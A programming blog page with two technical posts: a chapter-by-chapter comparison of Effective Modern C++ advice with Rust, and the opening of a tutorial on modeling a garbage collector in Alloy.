<h1>main is usually a function</h1>
<p><code>char* main = "usually a programming blog";</code> (a blog by keegan)</p>
<h2>A Rust view on Effective Modern C++ (2017-06-21)</h2>
<p>Recently I've been reading <a href="https://www.amazon.com/Effective-Modern-Specific-Ways-Improve/dp/1491903996/ref=sr_1_1"><em>Effective Modern C++</em></a> by Scott Meyers. It's a great book that contains tons of practical advice, as well as horror stories to astound your friends and confuse your enemies. Since Rust shares many core ideas with modern C++, I thought I'd describe how some of the C++ advice translates to Rust, or doesn't.</p>
<p>This is <em>not</em> a general-purpose Rust / C++ comparison. Honestly, it might not make a lot of sense if you haven't read the book I'm referencing. There are a number of C++ features missing in Rust, for example integer template arguments and advanced template metaprogramming. I'll say no more about those because they aren't new to <em>modern</em> C++.</p>
<p>I may have a clear bias here because I think Rust is a better language for most new development. However, I massively respect the effort the C++ designers have put into modernizing the language, and I think it's still the best choice for many tasks.</p>
<p>There's a common theme that I'll avoid repeating: most of the C++ pitfalls that result in undefined behavior will produce compiler or occasionally runtime errors in Rust.</p>
<h3 id="chapters-1-2-deducing-types-auto">Chapters 1 & 2: Deducing Types / <code>auto</code></h3>
<p>This is what Rust and many other languages call "type inference". C++ has always had it for calls to function templates, but it became much more powerful in C++11 with the <a href="http://en.cppreference.com/w/cpp/language/auto"><code>auto</code> keyword</a>.</p>
<p>Rust's type inference seems to be a lot simpler. I think the biggest reason is that Rust treats references as just another type, rather than the weird quasi-transparent things that they are in C++. Also, Rust doesn't require the <code>auto</code> keyword — whenever you want type inference, you just don't write the type. Rust also lacks <a href="http://en.cppreference.com/w/cpp/utility/initializer_list"><code>std::initializer_list</code></a>, which simplifies the rules further.</p>
<p>The main disadvantage in Rust is that return types are never inferred for <code>fn</code> items, only for lambdas. Mostly I think it's good style to write out those types anyway; GHC Haskell warns when you don't. But it does mean that returning a closure without boxing is impossible, and returning a complex iterator chain without boxing is extremely painful. Rust is starting to improve the situation with <a href="https://github.com/rust-lang/rfcs/blob/master/text/1522-conservative-impl-trait.md"><code>-> impl Trait</code></a>.</p>
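<p>As a sketch (assuming a compiler with <code>impl Trait</code> support), returning a closure without boxing looks like this; the names are mine, not from the book:</p>

```rust
// `impl Fn(i32) -> i32` names "some concrete closure type" without boxing it.
fn adder(x: i32) -> impl Fn(i32) -> i32 {
    move |y| x + y
}

fn main() {
    let add5 = adder(5);
    assert_eq!(add5(2), 7);
    println!("impl Trait return works");
}
```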
<p>Rust lacks <a href="http://en.cppreference.com/w/cpp/language/decltype"><code>decltype</code></a> and this is certainly a limitation. <em>Some</em> of the uses of <code>decltype</code> are covered by <a href="https://doc.rust-lang.org/book/first-edition/associated-types.html">trait associated types</a>. For example,</p>
<div class="sourceCode"><pre class="sourceCode cpp"><code class="sourceCode cpp"><span class="kw">template</span><<span class="kw">typename</span> Container, <span class="kw">typename</span> Index>
<span class="kw">auto</span> get(Container& c, Index i)
-> <span class="kw">decltype</span>(c[i])
{ … }</code></pre></div>
<p>becomes</p>
<div class="sourceCode"><pre class="sourceCode rust"><code class="sourceCode rust"><span class="kw">fn</span> get<Container, Index, Output>(c: &Container, i: Index) -> &Output
<span class="kw">where</span> Container: ops::Index<Index, Output=Output>
{ … }</code></pre></div>
<p>The advice to see inferred types by intentionally producing a type error applies equally well in Rust.</p>
<h3 id="chapter-3-moving-to-modern-c">Chapter 3: Moving to Modern C++</h3>
<p>Initializing values in Rust is much simpler. Constructors are just static methods named by convention, and they take arguments in the ordinary way. For good or for ill, there's no <code>std::initializer_list</code>.</p>
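<p>A minimal illustration (the type and its <code>new</code> function are hypothetical): constructors are just associated functions, conventionally named <code>new</code>, taking arguments the ordinary way.</p>

```rust
struct Point { x: f64, y: f64 }

impl Point {
    // Nothing special about this function; `new` is only a naming convention.
    fn new(x: f64, y: f64) -> Point {
        Point { x, y }
    }
}

fn main() {
    let p = Point::new(1.0, 2.0);
    assert_eq!(p.x, 1.0);
    assert_eq!(p.y, 2.0);
}
```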
<p><a href="http://en.cppreference.com/w/cpp/language/nullptr"><code>nullptr</code></a> is not an issue in Rust. <code>&T</code> and <code>&mut T</code> can't be null, and you can make null raw pointers with <a href="https://doc.rust-lang.org/std/ptr/fn.null.html"><code>ptr::null()</code></a> or <a href="https://doc.rust-lang.org/std/ptr/fn.null_mut.html"><code>ptr::null_mut()</code></a>. There are no implicit conversions between pointers and integral types.</p>
<p>Regarding aliases vs. typedefs, Rust also supports two syntaxes:</p>
<div class="sourceCode"><pre class="sourceCode rust"><code class="sourceCode rust"><span class="kw">use</span> foo::Bar <span class="kw">as</span> Baz;
<span class="kw">type</span> Baz = foo::Bar;</code></pre></div>
<p><a href="https://doc.rust-lang.org/book/first-edition/type-aliases.html"><code>type</code></a> is a lot more common, and it supports type parameters.</p>
<p>Rust <a href="https://doc.rust-lang.org/book/first-edition/enums.html"><code>enums</code></a> are always strongly typed. They are scoped unless you explicitly <code>use MyEnum::*;</code>. A C-like enum (one with no data fields) can be cast to an integral type.</p>
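<p>For example (a made-up enum, just to show the scoping and the cast):</p>

```rust
// A C-like enum: no data fields, so it can be cast to an integer.
// Variants are scoped under the enum name unless you `use Color::*;`.
#[derive(Clone, Copy)]
enum Color { Red = 1, Green = 2, Blue = 4 }

fn mask(c: Color) -> i32 {
    c as i32
}

fn main() {
    assert_eq!(mask(Color::Green), 2);
    assert_eq!(mask(Color::Red) | mask(Color::Blue), 5);
}
```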
<p><code>f() = delete;</code> has no equivalent in Rust, because Rust doesn't implicitly define functions for you in the first place.</p>
<p>Similar to the C++ <a href="http://en.cppreference.com/w/cpp/language/override"><code>override</code></a> keyword, Rust requires a <code>default</code> keyword to enable <a href="https://github.com/rust-lang/rfcs/blob/master/text/1210-impl-specialization.md">trait specialization</a>. Unlike in C++, it's mandatory.</p>
<p>As in C++, Rust methods can be declared to take <code>self</code> either by reference or by move. Unlike in C++, you can't easily overload the same method to allow either.</p>
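<p>A small sketch of the two receiver styles (the type is invented for illustration):</p>

```rust
struct Buffer { data: Vec<u8> }

impl Buffer {
    // `&self`: borrows the receiver; the value stays usable afterwards.
    fn len(&self) -> usize { self.data.len() }

    // `self`: takes the receiver by value, consuming it.
    fn into_data(self) -> Vec<u8> { self.data }
}

fn demo() -> usize {
    let b = Buffer { data: vec![1, 2, 3] };
    let n = b.len();       // fine: only borrows `b`
    let v = b.into_data(); // moves `b`; using `b` again would not compile
    n + v.len()
}

fn main() {
    assert_eq!(demo(), 6);
}
```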
<p>Rust supports const iterators smoothly. It's up to the iterator whether it yields <code>T</code>, <code>&T</code>, or <code>&mut T</code> (or even something else entirely).</p>
<p>The <a href="https://doc.rust-lang.org/std/iter/trait.IntoIterator.html"><code>IntoIterator</code></a> trait takes the place of functions like <a href="http://en.cppreference.com/w/cpp/iterator/begin"><code>std::begin</code></a> that produce an iterator from any collection.</p>
<p>Rust has no equivalent to <a href="http://en.cppreference.com/w/cpp/language/noexcept"><code>noexcept</code></a>. Any function can panic, unless panics are disabled globally. This is pretty unfortunate when writing <code>unsafe</code> code to implement data types that have to be exception-safe. However, <em>recoverable</em> errors in Rust use <a href="https://doc.rust-lang.org/std/result/enum.Result.html"><code>Result</code></a>, which <em>is</em> part of the function's type.</p>
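<p>To illustrate the last point (the function is hypothetical): a panic never shows up in a signature, but a recoverable error does.</p>

```rust
use std::num::ParseIntError;

// The possibility of failure is part of the type: callers must handle
// the `Result`, unlike a panic (or a C++ exception without `noexcept`).
fn parse_port(s: &str) -> Result<u16, ParseIntError> {
    s.parse::<u16>()
}

fn main() {
    assert_eq!(parse_port("8080"), Ok(8080));
    assert!(parse_port("not a port").is_err());
}
```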
<p>Rust supports a limited form of compile-time evaluation, but it's not yet nearly as powerful as C++14 <a href="http://en.cppreference.com/w/cpp/language/constexpr"><code>constexpr</code></a>. This is set to improve with the introduction of <a href="https://github.com/solson/miri">miri</a>.</p>
<p>In Rust you mostly don't have to worry about "making <code>const</code> member functions thread safe". If something is shared between threads, the compiler will ensure it's free of thread-related undefined behavior. (This to me is one of the coolest features of Rust!) However, you might run into higher-level issues such as deadlocks that Rust's type system can't prevent.</p>
<p>There are no special member functions in Rust, e.g. copy constructors. If you want your type to be <a href="https://doc.rust-lang.org/std/clone/trait.Clone.html"><code>Clone</code></a> or <a href="https://doc.rust-lang.org/std/marker/trait.Copy.html"><code>Copy</code></a>, you have to opt-in with a <a href="https://doc.rust-lang.org/book/first-edition/traits.html#deriving"><code>derive</code></a> or a manual <code>impl</code>.</p>
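<p>For instance (both types are made up): a type opts into copying or cloning explicitly, and a type containing a non-<code>Copy</code> field can be <code>Clone</code> but not <code>Copy</code>.</p>

```rust
#[derive(Clone, Copy, Debug, PartialEq)]
struct Meters(f64);

#[derive(Clone, Debug, PartialEq)]
struct Label(String); // String isn't Copy, so Label can only be Clone

fn main() {
    let m = Meters(5.0);
    let m2 = m;           // a copy: `m` stays usable
    assert_eq!(m, m2);

    let l = Label("gc".to_string());
    let l2 = l.clone();   // explicit; a plain `let l2 = l;` would move `l`
    assert_eq!(l, l2);
}
```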
<h3 id="chapter-4-smart-pointers">Chapter 4: Smart Pointers</h3>
<p>Smart pointers are very important in Rust, as in modern C++. Much of the advice in this chapter applies directly to Rust.</p>
<p><a href="http://en.cppreference.com/w/cpp/memory/unique_ptr"><code>std::unique_ptr</code></a> corresponds directly to Rust's <a href="https://doc.rust-lang.org/std/boxed/struct.Box.html"><code>Box</code></a> type. However, <code>Box</code> doesn't support custom deallocation code. If you need that, you have to either make it part of <a href="https://doc.rust-lang.org/book/first-edition/drop.html"><code>impl Drop</code></a> on the underlying type, or write your own smart pointer. <code>Box</code> also does not support custom allocators.</p>
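<p>A sketch of the <code>Drop</code> approach (the counter is only there so the example can observe the destructor running):</p>

```rust
use std::sync::atomic::{AtomicUsize, Ordering};

static DROPS: AtomicUsize = AtomicUsize::new(0);

// `Box` takes no deleter parameter; cleanup hooks live in a `Drop`
// impl on the boxed type instead.
struct Guard;

impl Drop for Guard {
    fn drop(&mut self) {
        DROPS.fetch_add(1, Ordering::SeqCst);
    }
}

fn drops_after_boxing() -> usize {
    let before = DROPS.load(Ordering::SeqCst);
    let g = Box::new(Guard);
    drop(g); // runs Guard's destructor exactly once
    DROPS.load(Ordering::SeqCst) - before
}

fn main() {
    assert_eq!(drops_after_boxing(), 1);
}
```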
<p><a href="http://en.cppreference.com/w/cpp/memory/shared_ptr"><code>std::shared_ptr</code></a> corresponds to Rust's <a href="https://doc.rust-lang.org/std/sync/struct.Arc.html"><code>Arc</code></a> type. Both provide thread-safe reference counting. Rust also supports much faster thread-local refcounting with the <a href="https://doc.rust-lang.org/std/rc/struct.Rc.html"><code>Rc</code></a> type. Don't worry, the compiler will complain if you try to send an <code>Rc</code> between threads.</p>
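<p>For example: sharing data with a spawned thread requires <code>Arc</code>; swapping in <code>Rc</code> below is a compile error, because <code>Rc</code> is not <code>Send</code>.</p>

```rust
use std::sync::Arc;
use std::thread;

fn sum_in_thread(v: Vec<i32>) -> i32 {
    let data = Arc::new(v);
    let data2 = Arc::clone(&data); // bumps the atomic refcount
    let handle = thread::spawn(move || data2.iter().sum::<i32>());
    handle.join().unwrap()
}

fn main() {
    assert_eq!(sum_in_thread(vec![1, 2, 3]), 6);
}
```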
<p>C++ standard libraries usually implement <code>shared_ptr</code> as a "fat pointer" containing both a pointer to the underlying value and a pointer to a refcount struct. Rust's <code>Rc</code> and <code>Arc</code> store the refcounts directly before the value in memory. This means that <code>Rc</code> and <code>Arc</code> are half the size of <code>shared_ptr</code>, and may perform better due to fewer indirections. On the downside, it means you can't upgrade <code>Box</code> to <code>Rc</code>/<code>Arc</code> without a reallocation and copy. It could also introduce performance problems on certain workloads, due to cache line sharing between the refcounts and the data. (I would love to hear from anyone who has run into this!) Boost supports <code>intrusive_ptr</code> which should perform very similarly to Rust's <code>Arc</code>.</p>
<p>Like <code>Box</code>, <code>Rc</code> and <code>Arc</code> don't support custom deleters or allocators.</p>
<p>Rust supports weak pointer variants of both <code>Rc</code> and <code>Arc</code>. Rather than panicking or returning <code>NULL</code>, the "upgrade" operation returns <code>None</code>, as you'd expect in Rust.</p>
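<p>Concretely: <code>Weak::upgrade</code> yields <code>Some</code> while the value is alive, and <code>None</code> once the last strong reference is dropped.</p>

```rust
use std::rc::Rc;

fn upgrade_after_drop() -> bool {
    let strong = Rc::new(42);
    let weak = Rc::downgrade(&strong);
    let alive_before = weak.upgrade().is_some(); // Some: `strong` still exists
    drop(strong);
    alive_before && weak.upgrade().is_none()     // None: the value is gone
}

fn main() {
    assert!(upgrade_after_drop());
}
```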
<h3 id="chapter-5-rvalue-references-move-semantics-and-perfect-forwarding">Chapter 5: Rvalue References, Move Semantics, and Perfect Forwarding</h3>
<p>This is a big one. Move semantics are rare among programming languages, but they're key in both Rust and C++. However, the two languages take very different approaches, owing to the fact that Rust was designed around moves whereas they're a late addition to C++.</p>
<p>There's no <a href="http://en.cppreference.com/w/cpp/utility/move"><code>std::move</code></a> in Rust. Moves are the default for non-<code>Copy</code> types. The behavior of a move or copy is <em>always</em> a shallow bit-wise copy; there is no way to override it. This can greatly improve performance. For example, when a Rust <a href="https://doc.rust-lang.org/std/vec/struct.Vec.html"><code>Vec</code></a> changes address due to resizing, it will use a highly optimized <a href="http://en.cppreference.com/w/cpp/string/byte/memcpy"><code>memcpy</code></a>. In comparison, C++'s <a href="http://en.cppreference.com/w/cpp/container/vector"><code>std::vector</code></a> has to call the move constructor on every element, or the copy constructor <a href="http://en.cppreference.com/w/cpp/utility/move_if_noexcept">if there's no <code>noexcept</code> move constructor</a>.</p>
<p>However the inability to hook moves and the difficulty of creating immovable types is an obstacle for certain kinds of advanced memory management, such as intrusive pointers and interacting with external garbage collectors.</p>
<p>Moves in C++ leave the source value in an unspecified but valid state — for example, an empty vector or a <code>NULL</code> unique pointer. This has several weird consequences:</p>
<ul>
<li>A move counts as mutating a source variable, so "Move requests on <code>const</code> objects are silently transformed into copy operations". This is a surprising performance leak.</li>
<li>The moved-out-of variable can still be used after the move, and you don't necessarily know what you'll get.</li>
<li>The destructor will still run and must take care not to invoke undefined behavior.</li>
</ul>
<p>The first two points don't apply in Rust. You can move out of a non-<code>mut</code> variable. The value isn't considered mutated, it's considered <em>gone</em>. And the compiler will complain if you try to use it after the move.</p>
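<p>A tiny demonstration of both points (the compile error is shown as a comment, since the example must build):</p>

```rust
// Moving out of a non-`mut` binding is fine; the source is simply *gone*
// afterwards, and the compiler rejects any later use.
fn move_demo() -> usize {
    let v = vec![1, 2, 3];  // not `mut`, yet we can move out of it
    let w = v;              // a shallow bitwise move of (ptr, len, cap)
    // println!("{:?}", v); // error[E0382]: use of moved value: `v`
    w.len()
}

fn main() {
    assert_eq!(move_demo(), 3);
}
```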
<p>The third point is somewhat similar to old Rust, where types with a destructor would contain an implicit "drop flag" indicating whether they had already been moved from. As of <a href="https://blog.rust-lang.org/2016/09/29/Rust-1.12.html">Rust 1.12 (September 2016)</a>, these hidden struct fields are gone, and good riddance! If a variable has been moved from, the compiler simply omits the call to its destructor. In situations where a value may or may not have been moved (e.g. a move inside one branch of an <code>if</code>), Rust tracks the state with drop flags kept in local variables on the stack.</p>
<p>Rust doesn't have a feature for perfect forwarding. There's no need to treat references specially, as they're just another type. Because there are no rvalue references in Rust, there's also no need for universal / forwarding references, and no <a href="http://en.cppreference.com/w/cpp/utility/forward"><code>std::forward</code></a>.</p>
<p>However, Rust lacks <a href="http://eli.thegreenplace.net/2014/variadic-templates-in-c/">variadic generics</a>, so you can't do things like "factory function that forwards all arguments to constructor".</p>
<p>Item 29 says "Assume that move operations are not present, not cheap, and not used". I find this quite dispiriting! There are so many ways in C++ to think that you're moving a value when you're actually calling an expensive copy constructor — and compilers won't even warn you!</p>
<p>In Rust, moves are <em>always</em> available, always as cheap as <code>memcpy</code>, and always used when passing by value. <code>Copy</code> types don't have move semantics, but they act the same at runtime. The only difference is whether the static checks allow you to use the source location afterwards.</p>
<p>All in all, moves in Rust are more ergonomic and less surprising. Rust's treatment of moves should also perform better, because there's no need to leave the source object in a valid state, and there's no need to call move constructors on individual elements of a collection. (But can we benchmark this?)</p>
<p>There's a bunch of other stuff in this chapter that doesn't apply to Rust. For example, "The interaction among perfect-forwarding constructors and compiler-generated copy and move operations develops even more wrinkles when inheritance enters the picture." This is the kind of sentence that will make me run away screaming. Rust doesn't have <em>any</em> of those features, gets by fine without them, and thus avoids such bizarre interactions.</p>
<h3 id="chapter-6-lambda-expressions">Chapter 6: Lambda Expressions</h3>
<p>C++ allows closures to be copied; Rust doesn't.</p>
<p>In C++ you can specify whether a lambda expression's captures are taken into the closure by reference or by value, either individually or for all captures at once. In Rust this is mostly inferred from how you use the captures: whether they are mutated, and whether they are moved from. However, you can mark a closure with the <a href="https://doc.rust-lang.org/book/first-edition/closures.html#move-closures"><code>move</code> keyword</a> to force all captures to be taken by value. This is useful when the closure itself will outlive its environment, as commonly happens when spawning threads.</p>
<p>Rust uses this inference for another purpose: determining which <code>Fn*</code> traits a closure will implement. If the lambda body moves out of a capture, it can only implement <a href="https://doc.rust-lang.org/std/ops/trait.FnOnce.html"><code>FnOnce</code></a>, whose "call" operator takes <code>self</code> by value. If it doesn't move but does mutate captures, it will implement <code>FnOnce</code> and <a href="https://doc.rust-lang.org/std/ops/trait.FnMut.html"><code>FnMut</code></a>, whose "call" takes <code>&mut self</code>. And if it neither moves nor mutates, it will implement all of <code>FnOnce</code>, <code>FnMut</code>, and <a href="https://doc.rust-lang.org/std/ops/trait.Fn.html"><code>Fn</code></a>. C++ doesn't have traits (yet) and doesn't distinguish these cases. If your lambda moves from a capture, you can call it again and you'll see whatever "empty" value was left behind by the move constructor.</p>
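<p>For instance (the helper function is mine): a closure that moves a capture out can be passed where <code>FnOnce</code> is expected, but a bound of <code>Fn</code> or <code>FnMut</code> would reject it at compile time.</p>

```rust
fn call_once<F: FnOnce() -> String>(f: F) -> String {
    f()
}

// `consume` moves `s` out of its capture, so it implements only `FnOnce`:
// it can be called at most once, and the type system enforces that.
fn consume_demo() -> String {
    let s = String::from("hello");
    let consume = move || s;
    call_once(consume)
}

fn main() {
    assert_eq!(consume_demo(), "hello");
}
```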
<p>Rust doesn't support init capture; however, move capture is supported natively. You can do whatever init you like outside the lambda and then move the result in.</p>
<p>Like C++, Rust allows inference of closure parameter types. Unlike C++, an individual closure cannot be generic.</p>
<h3 id="chapter-7-the-concurrency-api">Chapter 7: The Concurrency API</h3>
<p>Rust doesn't have futures in the standard library; they're part of <a href="https://crates.io/crates/futures">an external library</a> maintained by a core Rust developer. They're also used for <a href="https://github.com/tokio-rs/tokio">async I/O</a>.</p>
<p>In C++, dropping a <a href="http://en.cppreference.com/w/cpp/thread/thread"><code>std::thread</code></a> that is still running terminates the program, which certainly seems un-fun to me. The behavior is justified by the possibility that the thread captures by reference something from its spawning context. If the thread then outlived that context, it would result in undefined behavior. In Rust, this can't happen because <a href="https://doc.rust-lang.org/std/thread/fn.spawn.html"><code>thread::spawn(f)</code></a> has a <code>'static</code> bound on the type of <code>f</code>. So, when a Rust <a href="https://doc.rust-lang.org/std/thread/struct.JoinHandle.html"><code>JoinHandle</code></a> falls out of scope, the thread is safely detached and continues to run.</p>
<p>The other possibility, in either language, is to join threads on drop, waiting for the thread to finish. However this has surprising performance implications and <a href="https://github.com/rust-lang/rust/issues/24292">still isn't enough</a> to allow threads to safely borrow from their spawning environment. Such "scoped threads" are provided by <a href="http://aturon.github.io/crossbeam-doc/crossbeam/fn.scope.html">libraries in Rust</a> and use a different technique to ensure safety.</p>
<p>C++ and Rust both provide atomic variables. In C++ they support standard operations such as assignment, <code>++</code>, and atomic reads by conversion to the underlying type. These all use the "sequentially consistent" <a href="http://en.cppreference.com/w/cpp/atomic/memory_order">memory ordering</a>, which provides the strongest guarantees. Rust is more explicit, using dedicated methods like <code>fetch_add</code> which also specify the <a href="https://doc.rust-lang.org/std/sync/atomic/enum.Ordering.html">memory ordering</a>. (This kind of API is also available in C++.)</p>
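<p>A small sketch of the explicit style: every atomic operation names its memory ordering, here the sequentially consistent one.</p>

```rust
use std::sync::atomic::{AtomicUsize, Ordering};
use std::sync::Arc;
use std::thread;

// Spawn `n` threads that each increment a shared counter once.
fn count_to(n: usize) -> usize {
    let counter = Arc::new(AtomicUsize::new(0));
    let handles: Vec<_> = (0..n)
        .map(|_| {
            let c = Arc::clone(&counter);
            thread::spawn(move || {
                // The ordering is spelled out at the call site.
                c.fetch_add(1, Ordering::SeqCst);
            })
        })
        .collect();
    for h in handles {
        h.join().unwrap();
    }
    counter.load(Ordering::SeqCst)
}

fn main() {
    assert_eq!(count_to(4), 4);
}
```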
<p>This chapter also talks about the C++ type qualifier <a href="http://en.cppreference.com/w/cpp/language/cv"><code>volatile</code></a>, even though it has to do with stuff like memory-mapped I/O and not threads. Rust doesn't have volatile types; instead, a volatile read or write is done using an <a href="https://doc.rust-lang.org/std/ptr/fn.read_volatile.html">intrinsic function</a>.</p>
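<p>Concretely, a volatile access is an explicit call on a raw pointer rather than a property of the type:</p>

```rust
// `read_volatile` forces an actual memory read that the optimizer
// may not elide or reorder with other volatile operations.
fn volatile_read(x: &u32) -> u32 {
    unsafe { std::ptr::read_volatile(x) }
}

fn main() {
    assert_eq!(volatile_read(&7), 7);
}
```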
<h3 id="chapter-8-tweaks">Chapter 8: Tweaks</h3>
<p>Rust containers don't have methods like <a href="http://en.cppreference.com/w/cpp/container/vector/emplace_back"><code>emplace_back</code></a>. You can however use the experimental <a href="https://github.com/rust-lang/rust/issues/27779">placement-new feature</a>.</p>
<h3 id="conclusions">Conclusions</h3>
<p>Rust and C++ share many features, allowing a detailed comparison between them. Rust is a much newer design that isn't burdened with 20 years of backwards compatibility. This I think is why Rust's versions of these core features tend to be simpler and easier to reason about. On the other hand, Rust gains some complexity by enforcing strong static guarantees.</p>
<p>There are of course some differences of principle, not just historical quirks. C++ has an object system based on classes and inheritance, even allowing multiple inheritance. There's no equivalent in Rust. Rust also prefers simple and explicit semantics, while C++ allows a huge amount of implicit behavior. You see this for example with implicit copy construction, implicit conversions, ad-hoc function overloading, quasi-transparent references, and the operators on <code>atomic</code> values. There are still some implicit behaviors in Rust, but they're carefully constrained. Personally I prefer Rust's explicit style; I find there are too many cases where C++ doesn't "do what I mean". But other programmers may disagree, and that's fine.</p>
<p>I hope and expect that C++ and Rust will converge on similar feature-sets. C++ is scheduled to get <a href="http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2016/p0142r0.pdf">a proper module system</a>, <a href="http://en.cppreference.com/w/cpp/language/constraints">a "concepts" system similar to traits</a>, and <a href="https://isocpp.org/blog/2015/09/bjarne-stroustrup-announces-cpp-core-guidelines">a subset with statically-checkable memory safety</a>. Rust will eventually have <a href="https://github.com/rust-lang/rfcs/issues/1038">integer generics</a>, <a href="https://github.com/rust-lang/rfcs/issues/376">variadic generics</a>, and more powerful <code>const fn</code>. It's an exciting time for both languages :)</p>
<h2>Modeling garbage collectors with Alloy: part 1 (2015-05-03)</h2>
<p>Formal methods for software verification are usually seen as a high-cost tool that you would only use on the most critical systems, and only after extensive informal verification. The <a href="http://alloy.mit.edu/alloy/">Alloy</a> project aims to be something completely different: a lightweight tool you can use at any stage of everyday software development. With just a few lines of code, you can build a simple model to explore design issues and corner cases, even before you've started writing the implementation. You can gradually make the model more detailed as your requirements and implementation get more complex. After a system is deployed, you can keep the model around to evaluate future changes at low cost.</p>
<p>Sounds great, doesn't it? I have only a tiny bit of prior experience with Alloy and I wanted to try it out on something more substantial. In this article we'll build a simple model of a <a href="http://en.wikipedia.org/wiki/Tracing_garbage_collection">garbage collector</a>, visualize its behavior, and fix some problems. This is a warm-up for exploring more complex GC algorithms, which will be the subject of future articles.</p>
<p>I won't describe the Alloy syntax in full detail, but you should be able to follow along if you have some background in programming and logic. See also the <a href="http://alloy.mit.edu/alloy/documentation.html">Alloy documentation</a> and especially the book <a href="http://www.amazon.com/Software-Abstractions-Logic-Language-Analysis/dp/0262017156/ref=sr_1_1"><em>Software Abstractions: Logic, Language, and Analysis</em></a> by Daniel Jackson, which is a very practical and accessible introduction to Alloy. It's a highly recommended read for any software developer.</p>
<p>You can <a href="http://alloy.mit.edu/alloy/download.html">download Alloy</a> as a self-contained Java executable, which can do analysis and visualization and includes an editor for Alloy code.</p>
<h1 id="the-model">The model</h1>
<p>We will start like so:</p>
<pre><code class="sourceCode"><span class="kw">open</span> util/ordering [State]
<span class="kw">sig</span> Object { }
<span class="kw">one</span> <span class="kw">sig</span> Root <span class="kw">extends</span> Object { }
<span class="kw">sig</span> State {
pointers: Object -> <span class="kw">set</span> Object,
collected: <span class="kw">set</span> Object,
}</code></pre>
<p>The garbage-collected heap consists of <code>Object</code>s, each of which can point to any number of other <code>Object</code>s (including itself). There is a distinguished object <code>Root</code> which represents everything that's accessible <em>without</em> going through the heap, such as global variables and the function call stack. We also track which objects have already been garbage-collected. In a real implementation these would be candidates for re-use; in our model they stick around so that we can detect use-after-free.</p>
<p>The <code>open</code> statement invokes a library module to provide a total ordering on <code>State</code>s, which we will interpret as the progression of time. More on this later.</p>
<h1 id="relations">Relations</h1>
<p>In the code that follows, it may look like Alloy has lots of different data types, overloading operators with total abandon. In fact, all these behaviors arise from an exceptionally simple data model:</p>
<blockquote>
<p>Every value is a <a href="http://en.wikipedia.org/wiki/Finitary_relation"><em>relation</em></a>; that is, a set of tuples of the same non-zero length.</p>
</blockquote>
<p>When each tuple has length 1, we can view the relation as a set. When each tuple has length 2, we can view it as a <a href="http://en.wikipedia.org/wiki/Binary_relation">binary relation</a> and possibly as a function. And a singleton set is viewed as a single atom or tuple.</p>
<p>Since everything in Alloy is a relation, each operator has a single definition in terms of relations. For example, the operators <code>.</code> and <code>[]</code> are syntax for a flavor of <a href="http://en.wikipedia.org/wiki/Relational_algebra#Joins_and_join-like_operators">relational join</a>. If you think of the underlying relations as a database, then Alloy's clever syntax amounts to an <a href="http://en.wikipedia.org/wiki/Object-relational_mapping">object-relational mapping</a> that is at once very simple and very powerful. Depending on context, these joins can look like field access, function calls, or data structure lookups, but they are all described by the same underlying framework.</p>
<p>The elements of the tuples in a relation are <em>atoms</em>, which are indivisible and have no meaning individually. Their meaning comes entirely from the relations and properties we define. Ultimately, atoms all live in the same universe, but Alloy gives "warnings" when the type system implied by the <code>sig</code> declarations can prove that an expression is always the empty relation.</p>
<p>Here are the relations implied by our GC model, as tuple sets along with their types:</p>
<pre><code class="sourceCode">Object: {Object} = {O1, O2, ..., Om}
Root: {Root} = {Root}
State: {State} = {S1, S2, ..., Sn}
pointers: {(State, Object, Object)}
collected: {(State, Object)}
first: {State} = {S1}
last: {State} = {Sn}
next: {(State, State)} = {(S1, S2), (S2, S3), ..., (S(n-1), Sn)}</code></pre>
<p>The last three relations come from the <code>util/ordering</code> library. Note that a <code>sig</code> implicitly creates some atoms.</p>
<h1 id="dynamics">Dynamics</h1>
<p>The live objects are everything reachable from the root:</p>
<pre><code class="sourceCode"><span class="kw">fun</span> live(s: State): <span class="kw">set</span> Object {
Root.*(s.pointers)
}</code></pre>
<p><code>*(s.pointers)</code> constructs the <a href="http://en.wikipedia.org/wiki/Reflexive_closure">reflexive</a>, <a href="http://en.wikipedia.org/wiki/Transitive_closure">transitive</a> closure of the binary relation <code>s.pointers</code>; that is, the set of objects reachable from each object.</p>
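<p>If Alloy's relational notation feels abstract, here is the same computation sketched in ordinary code: <code>Root.*(s.pointers)</code> is just graph reachability. The object ids and example graph below are made up for illustration.</p>

```rust
use std::collections::{HashMap, HashSet};

// Everything reachable from `root` through the `pointers` relation,
// i.e. the live set, computed by a depth-first traversal.
fn live(root: u32, pointers: &HashMap<u32, Vec<u32>>) -> HashSet<u32> {
    let mut seen = HashSet::new();
    let mut stack = vec![root];
    while let Some(o) = stack.pop() {
        if seen.insert(o) {
            if let Some(succs) = pointers.get(&o) {
                stack.extend(succs.iter().cloned());
            }
        }
    }
    seen
}

fn demo_live_contains(obj: u32) -> bool {
    let mut ptrs = HashMap::new();
    ptrs.insert(0, vec![1]); // Root -> O1
    ptrs.insert(1, vec![2]); // O1 -> O2
    ptrs.insert(3, vec![2]); // O3 -> O2, but O3 itself is unreachable
    live(0, &ptrs).contains(&obj)
}

fn main() {
    assert!(demo_live_contains(2));  // reachable via Root -> O1 -> O2
    assert!(!demo_live_contains(3)); // dead: nothing points to O3
}
```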
<p>Of course the GC is only part of a system; there's also the code that actually uses these objects, which in GC terminology is called the <em>mutator</em>. We can describe the action of each part as a predicate relating "before" and "after" states.</p>
<pre><code class="sourceCode"><span class="kw">pred</span> mutate(s, t: State) {
t.collected = s.collected
t.pointers != s.pointers
<span class="kw">all</span> a: Object - t.live |
t.pointers[a] = s.pointers[a]
}
<span class="kw">pred</span> gc(s, t: State) {
t.pointers = s.pointers
t.collected = s.collected + (Object - s.live)
<span class="kw">some</span> t.collected - s.collected
}</code></pre>
<p>The mutator cannot collect garbage, but it can change the pointers of any live object. The GC doesn't touch the pointers, but it collects any dead object. In both cases we require that <em>something</em> changes in the heap.</p>
<p>It's time to state the overall facts of our model:</p>
<pre><code class="sourceCode"><span class="kw">fact</span> {
<span class="kw">no</span> first.collected
first.pointers = Root -> (Object - Root)
<span class="kw">all</span> s: State - last |
<span class="kw">let</span> t = s.next |
mutate[s, t] <span class="kw">or</span> gc[s, t]
}</code></pre>
<p>This says that in the initial state, no object has been collected, and every object is in the root set except <code>Root</code> itself. This means we don't have to model allocation as well. Each state except the last must be followed by a mutator step or a GC step.</p>
<p>The syntax <code>all x: e | P</code> says that the property <code>P</code> must hold for every tuple <code>x</code> in <code>e</code>. Alloy supports a variety of quantifiers like this.</p>
<h1 id="interacting-with-alloy">Interacting with Alloy</h1>
